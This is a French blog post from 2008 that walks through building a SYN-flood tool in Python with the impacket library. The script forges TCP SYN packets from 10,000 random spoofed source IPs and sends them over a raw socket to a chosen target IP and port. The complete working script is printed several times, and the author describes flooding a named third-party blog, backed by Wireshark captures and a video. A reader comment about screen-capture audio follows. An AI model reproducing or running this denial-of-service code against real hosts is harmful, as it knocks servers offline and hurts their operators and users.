Sortez vos marteaux et vos enclumes, on va forger…
Pour ce qui est du « syn flooding » je vous renvoie à Wikipedia.
Nous allons donc forger des paquet IP qui vont envoyer des demandes d’ouverture de sessions à un serveur.
Il faut donc que le flag SYN des nos entêtes TCP soit à 1, et puis c’est tout.
Alors, voilà comment on forge notre paquet « type » :
#!/usr/bin/python2.5
#-*- coding:Utf-8 -*-
from impacket import ImpactPacket
import sys
if __name__ == ‘__main__’:
if len(sys.argv) < 3 :
print( » Il faut mettre l’ip cible en paramètre ainsi que le port.\nexemple : ./forge.py 192.168.1.69 80″)
exit(0)
monPaquet = ImpactPacket.IP()
monTcp = ImpactPacket.TCP()
monPaquet.set_ip_dst( sys.argv[1] )
monPaquet.set_ip_src( ip )
monPaquet.contains( monTcp)
monTcp.set_th_sport( int( sys.argv[2] ) )
monTcp.set_th_dport( int( sys.argv[2] ) )
monTcp.set_th_seq( 1 )
monTcp.set_SYN()
monTcp.calculate_checksum()
monTcp.auto_checksum = 1
On commence par créer notre paquet IP via IP(), puis notre segment TCP avec TCP() [ très compliqué pour le moment ...].
Ensuite :
au niveau de monPaquet :
– set_ip_dst() : ip de destination ( notre « cible » )
– set_ip_src() : ip source. Vaut ip : on va générer après des IP aléatoires.
– contains() : encapsule monTcp .
au niveau de monTcp :
– set_th_sport() : le port source
– set_th_dport() : le port de destination
– set_th_seq() : numéro du paquet ( un id ), le paquet suivant aura le numéro seq +1 .Ici, on peut mettre un numéro aléatoire.
– set_SYN() : par défaut, tous les flags sont à 0. set_SYN() [ comme les autres setters des flags : set_ACK(), ...] va mettre son flag a 1 s’il vaut 0 et inversement. Ici, le flag SYN vaudra donc 1.
– calculate_checksum() : à ne pas oublier ! va calculer le checksum de notre entête Tcp .
– auto_checksum : à ne pas oublier également ! attribut de monTcp, vaut 1 par défaut, et doit valoir 1 pour que calculate_checksum() s’éxécute. A la fin, calculate_checksum() met à 0 auto_checksum donc on doit le remettre à 1 (il est utilisé par la suite) .
Et bien voilà notre joli paquet est construit . On a appris à forger notre propre paquet….youhou…..
Maintenant on va générer des ip aléatoires, et pour chaque IP générée, on va créer un paquet .
Voici le petit code :
#!/usr/bin/python2.5
#-*- coding:Utf-8 -*-
import sys
from random import randint
from impacket import ImpactPacket
def ipSource():
« »" va retourner une liste d’ip aléatoires bonnes ou mauvaises « »"
liste = []
for i in range( 10000):
liste.append( str( randint(1, 255) ) + « . » + str( randint(1, 255) ) + « . » + str( randint(1, 255) ) + « . » + str( randint(1, 255) ) )
return liste
if __name__ == ‘__main__’:
if len(sys.argv) < 3 :
print( » Il faut mettre l’ip cible en paramètre ainsi que le port.\nexemple : ./forge.py 192.168.1.69 80″)
exit(0)
for ip in ipSource() :
monPaquet = ImpactPacket.IP()#on crée la couche 3
monTcp = ImpactPacket.TCP()#la couche 4
monPaquet.set_ip_dst( sys.argv[1] )
monPaquet.set_ip_src( ip )
monPaquet.contains( monTcp )
monTcp.set_th_sport( int( sys.argv[2] ) )
monTcp.set_th_dport( int( sys.argv[2] ) )
monTcp.set_th_seq( 1 )
monTcp.set_SYN()
monTcp.calculate_checksum()
monTcp.auto_checksum = 1
Je ne vais pas expliquer en détail, c’est assez bateau : on a simplement rajouter une boucle, et notre fonction ipSource va générer une liste d’ip ( qu’elles soient mauvaises ou bonnes on s’en fou) .
Il nous reste plus qu’à envoyer nos paquets, à la fin du code, rajoutez :
maSocket = ImpactPacket.socket.socket(ImpactPacket.socket.AF_INET, ImpactPacket.socket.SOCK_RAW, ImpactPacket.socket.IPPROTO_TCP )
maSocket.setsockopt(ImpactPacket.socket.IPPROTO_IP, ImpactPacket.socket.IP_HDRINCL, 1)
maSocket.sendto( monPaquet.get_packet(), ( sys.argv[1], int( sys.argv[2] ) ) )
Cette dernière partie est un peu compliquée :
on instancie maSocket via socket() qui prend 3 paramètres :
– socket.AF_INET : indique la famille de maSocket ( il existe aussi AF_UNIX, … )
– socket.SOCK_RAW : indique le type de communication de maSocket ( on utilise le mode caractère ; il y a aussi le mode datagramme : SOCK_DGRAM, enfin il en existe pas mal )
– socket.IPPROTO_TCP : indique le numéro du protocole TCP, on aurait donc pu le remplacer par 6, mais ca fait moins compliqué .
La méthode setsockopt() de maSocket va nous permettre de définir des options.
setsockopt() prend 3 paramètres :
– la couche où se trouve l’option.
– le nom de l’option.
– la valeur de l’option.
Dans notre cas, on doit préciser que notre paquet contient l’entête IP ( et que ce ne sera pas au système de l’ajouter) , donc :
– la couche où se trouve l’option sera donc la couche IP :socket.IPPROTO_IP
– l’option sera socket.IP_HDRINCL afin d’indiquer que l’entête est fournie par nos soins.
– la valeur de notre option vaudra donc 1.
Enfin, sendto() va envoyer monPaquet via sa méthode get_packet() , au serveur « cible » sur le port donné ( l’ip du serveur ainsi que le port doivent être dans un tuple ).
Voilà, voilà, c’est terminé.
Voici le code complet :
#!/usr/bin/python2.5
#-*- coding:Utf-8 -*-
import sys
from random import randint
from impacket import ImpactPacket
def ipSource():
« »" va retourner une liste d’ip aléatoires « »"
liste = []
for i in range( 10000):
liste.append( str( randint(1, 255) ) + « . » + str( randint(1, 255) ) + « . » + str( randint(1, 255) ) + « . » + str( randint(1, 255) ) )
return liste
if __name__ == ‘__main__’:
if len(sys.argv) < 3 :
print( » Il faut mettre l’ip cible en paramètre ainsi que le port.\nexemple : ./forge.py 192.168.1.69 80″)
exit(0)
for ip in ipSource() :
monPaquet = ImpactPacket.IP()
monTcp = ImpactPacket.TCP()
monPaquet.set_ip_dst( sys.argv[1] )
monPaquet.set_ip_src( ip )
monPaquet.contains( monTcp )
monTcp.set_th_sport( int( sys.argv[2] ) )
monTcp.set_th_dport( int( sys.argv[2] ) )
monTcp.set_th_seq( 1 )
monTcp.set_SYN()
monTcp.calculate_checksum()
monTcp.auto_checksum = 1
maSocket = ImpactPacket.socket.socket(ImpactPacket.socket.AF_INET, ImpactPacket.socket.SOCK_RAW, ImpactPacket.socket.IPPROTO_TCP )
maSocket.setsockopt(ImpactPacket.socket.IPPROTO_IP, ImpactPacket.socket.IP_HDRINCL, 1)
maSocket.sendto( monPaquet.get_packet(), ( sys.argv[1], int( sys.argv[2] ) ) )
Pour illustrer que nos paquets forgés sont bons, ainsi que le syn flood ca marche voisi deux captures de wireshark:
je reçois bien mes paquets forgés et donc la demande d’ouverture de sesion :
et je réponds bien envoyant un SYN + ACK :
Et une petite vidéo ( par contre pas de son, je ne connais pas de logiciel faisant la capture vidéo/son ) qui va montrer que le syn flood ca marche plutôt bien, mais bon à ne pas faire, à moins d’être vraiment con, et il y en a …
La vidéo fait donc un synflood sur holin-blog ( de très bons articles, que dis-je de somptueux articles, csm.. ) :
Si vous voulez la télécharger (et elle est en meilleure qualité) c’est ici.
Lundi, novembre 10th, 2008, 15 h 34 min | 
Python | 
RSS feed
| 
Respond | 
Trackback
16 juin 2010 at 11 h 56 min
Pour le son xvidcap le fait, chez moi ca foire en le lancant direct.
Je le lance avec pulseaudio
padsp xvidcap
Dans le gestionnaire de son il y a juste à mettre la bonne interface de capture et ca doit le faire.
merci pour l’article